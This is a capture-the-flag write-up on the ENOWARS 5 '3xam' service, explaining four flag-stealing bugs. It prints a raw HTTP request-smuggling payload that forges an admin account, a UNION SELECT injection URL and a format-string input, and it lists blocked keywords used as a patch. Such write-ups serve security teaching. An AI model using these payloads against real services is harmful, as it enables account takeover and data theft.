# ENOWARS 5 - 3xam

3xam is a Python-based service, which has three relevant components (source):

• backend: this is actually just a server-side request stub which relies on the Noise Protocol and WebSockets (to make traffic analysis a bit harder).
• backend_internal: the actual backend, which can only be communicated with through the server-side request stub
• logger: a logging backend which stores all the logged data of all components in SQLite databases

# Noise and it’s public keys

When we look at the source of the backend_internal service, we notice that there are some default user accounts being added. They are added together with public keys, which actually refer to the public keys of the checker (at least for the one with the admin privileges). The public key is extracted from the handshake in backend and always sent along with the request towards backend_internal. The relevant code of the SSR looks as follows:

There are a couple of things to note here. First, parsed (line 10) refers to the data that was sent over the Noise-enabled WebSocket. In lines 17 and 18, the service checks that the URL cannot point to arbitrary servers, but must be targeted towards backend_internal through http. However, looking at line 10, we see that based on our input, we can add arbitrary keys to the dictionary. In line 21, these are then unpacked and passed to session.request as parameters.

# Bug 1: proxies

If we pay close attention to the signature of session.request, we note that one the arguments is called proxies. This can be used to configure proxies to be used by requests (see documentation). This support HTTP proxies, which you basically talk to almost like a regular HTTP server. So, while we cannot set the hostname of a URL to something other than backend_internal, we can instead use a proxy. So, what can we do with this?

## Quick dive into the logger

The logger backend (running on http://logger:80) just has a single relevant endpoint for us: if we get http://logger:80/backend_internal, we will receive all log entries that belong to the backend_internal component. As we could see from looking at the functionality, the gameserver stores a flag through a syshealth feature (it is not too important what this does, because it is just meant to fake some benign functionality and write a flag to the log). Notably, though, if we can get access to the logger, we can read those flags.

## The actual exploit

Now that we have some target we can use, let’s build an exploit. We can just use the trick with the proxies to provide a URL that passes the checks in line 17 and 18, but in fact connects to the logger endpoint:

This gave us a total of 12741 valid flags throughout the entire CTF.

# Bug 2: Unintended HTTP Request Smuggling

HTTP Request Smuggling (or HRS for short) is usually an attack in which we are able to confuse front- and back-end servers, such that the front-end only sees one HTTP request, but the backend sees (at least two). PortSwigger have a nice explanation on the subject.

## Some background

Before we get to the exploit, we need to discuss some basic functionality in the backend_internal service, starting in line 35 of backend_internal/app/resources/user.py:

Note that in line 3 of the snippet get_current_user is called. This uses the X-PubKey header to get the currnet user’s public key and searches in the database for a user with that key. If none is found (e.g., because we have not yet registered), a user is generated with that public key (line 14) and the default privileges, namely USER_TYPE_NORMAL (line 5).

If we want to add another user, we need to be of type USER_TYPE_ADMIN (line 8). However, by default, only the gameserver checker knows the necessary key pair. If we somehow could manage to produce a request to this endpoint with the gameserver’s X-PubKey, this would enable us to add arbitrary users with arbitrary types. Notably, a user with USER_TYPE_ADMIN has three important capabilities: they can directly use admin functionality to get the logs (which we already exploited through the proxies), they can see the information (including the name) of arbitrary users (regular users can only see usernames for “normal” users), and they can see the provided answers to questions in the exams. So, if we can become admin, we can actually exploit all three flag stores at the same time.

The “authentication” in this service is done only with the public key used in the Noise protocol. In line 12 of the code at the beginning of this post, we can see that the public key is set after our input is parsed, i.e., we cannot overwrite X-PubKey with something of our choice. However, if we somehow manage to smuggle a second request, this is entirely controlled by us. Together with the functionality of registering users with arbitrary privileges (if only we have the correct X-PubKey set), we can now exploit this.

## The actual exploit

There are usually two ways in which HTTP servers know how long a request is: the Content-Length field indicates how many bytes should be read, and, alternatively, Transfer-Encoding: chunked means that we send chunked data. This basically works as follows:

• Send hex number of bytes to come in next chunk on a single line, followed by \r\n.
• Send corresponding number of bytes, followed by \r\n
• Go to step 1. If we are done sending data, just send 0\r\n

The HTTP standard mandates that if Transfer-Encoding: chunked is present, the server must disregard Content-Length. So, all we need to do (remember: we control basically everything sent through session.request in line 21) is to prepare a request which will be interpreted as two requests by the backend_internal. Our payload for that is pretty straight forward:

In essence, we first make a GET request to the /users endpoint. We do not really care about the result of that, because our goal is merely to smuggle the second request. The data being sent to backend_internal looks something like this:

GET /users HTTP/1.1
Host: backend_internal
Transfer-Encoding: chunked
Connection: Keep-Alive
X-PubKey: <our_pubkey>
Content-Length: <howeverLongTheTotalRequestIs>

0

POST /users HTTP/1.1
X-PubKey: cBjEl+JgQG9tsngU3ieItjg360I8VSkB+YOUbp3A3yY=
Host: backend_internal
Content-Length: <inner_length>
Content-Type: application/json

{"pubkey": <our_pubkey>, "name": <random_user>, "user_type_id": 1}


The backend_internal observes the first request, ignores the Content-Length (since we have chunked encoding) and parses the empty chunk. Since we explicitly tell it to keep the connection open (Connection: Keep-Alive), it now parses the remaining data, which is our smuggled request. While we cannot see the result of this request, we don’t care because the state-changing action has taken place and our account is now an admin user.

With this, we can now access /questions/1 to see all answers (aka flags), use /users/<id> to learn the names of all users (aka flags), and also access the admin log backend /admin/logs?tag=/app/resources/admin/syshealth&match=ENO in the following couple of requests :-)

According to the organizers, this was unintended, but still allowed us to get first blood on all flag stores (basically at the same time)

# Bug 3: SQL injection in scores

Full disclosure: I did not find this myself, but saw an attack against us. I pimped the exploit to steal flags from two stores, though ;-)

The entire database management is done through a custom ORM (backend_internal/app/orm/model.py). Rather than using prepared statements or the likes, the service uses string formatting to build up the query. In backend_internal/app/resources/scores.py, there is attacker-controlled input in the count parameter. The relevant lines of code are as follows:

As we can see in line 10, models.Score.find is invoked with limit=count, whereas count originates from the GET parameter count (line 6). Since this is just used in string formatting (not a prepared statement), we can inject a UNION SELECT into the statement. The original attack against us looked something like this:

/exams/1/scores?count=123)x+UNiON+SeLECT+NULL,+id,+NULL,+100+from+users+whEre+user_type_id=2+%23


The resulting query looked as follows:

Importantly, the result of this query is not just output, but instead passed through Python once more in lines 13 and 14 of the above listing. This snippet takes the user_id coming from the database query and then “resolves” the username. Since the query above returns all user names of user_type_id 2, this yields all flags added by the gameserver for that flag store.

The added benefit of the SQL injection is that we can actually exploit it to also get the flags from the answers (which I have not observed being used against us). Specifically, as long as we select a valid user ID, the above shown Python code does not throw an error. At the end of the get function, we receive the list of users and their scores. The score, however, is not checked to be of type integer. Hence, we can expand the exploit and also do the following UNION SELECT:

Note that the last field is the score, which is output. We just always select user_id as 1, since this is the admin account we know of. So, the output of the request then contains a lot of entries for the user admin, everytime with a different flag from the answers as his score.

# Bug 4: Format string

The final (?) bug is of yet another type, namely a format string. When submitting an answer to a question, we get feedback from the service whether our answer was correct or not. This happens in backend_internal/app/resources/exam_questions.py. The notable part of the functionality is shown below:

We see that our answer (line 7) is seemingly sanitized and then used in generation of success_message and fail_message. Depending on whether our answer was correct, the osd_message variable is assigned to either one of them. Notably, we have an invocation of formatting twice. That means, if we can put something like {submission} into the osd_message used in line 21, this will be resolved by Python when formatting the message. However, as line 7 shows, our data is sanitized and all relevant chars are stripped, right?

Well, no :-) Python’s strip is a built-in on strings, this is really a custom function called strip:

This invokes string.replace with the third parameter set to True. Unfortunately, replace has a third parameter, which is the amount of replacements. True translates to 1, i.e., this replaces the first occurrence of each of the dangerous characters… but that is it. Because the custom ORM adds some weird relations to each other, we can just ask the service to format {submission.question.answers} to retrieve all answers for a particular question. Since the gameserver always answers question 1 in his answers, we just have to provide a wrong answer to the first question and send {}.{submission.question.answers}. The first three “dangerous” characters are stripped, so we get our desired format string. In yet another full disclosure, I found this bug an hour before the end of the CTF, but managed to overcomplicate things (attempting to import os as you would in a template injection). The service author let us know after the CTF how easy it actually was :-(

# Summary, Patches, and shitload of boilerplate code

Really fun service, for which we got first blood on all stores because of the unintended HRS flaw. I did not actually modify any of the functionality of backend_internal. Instead, I just made sure that backend would not even handle requests which carry keywords like proxies, union, or chunked :-)

## All exploits combined

Here is a Python file with all the boilerplate code, which is frankenstein’ed together, so no guarantee it actually works ;-)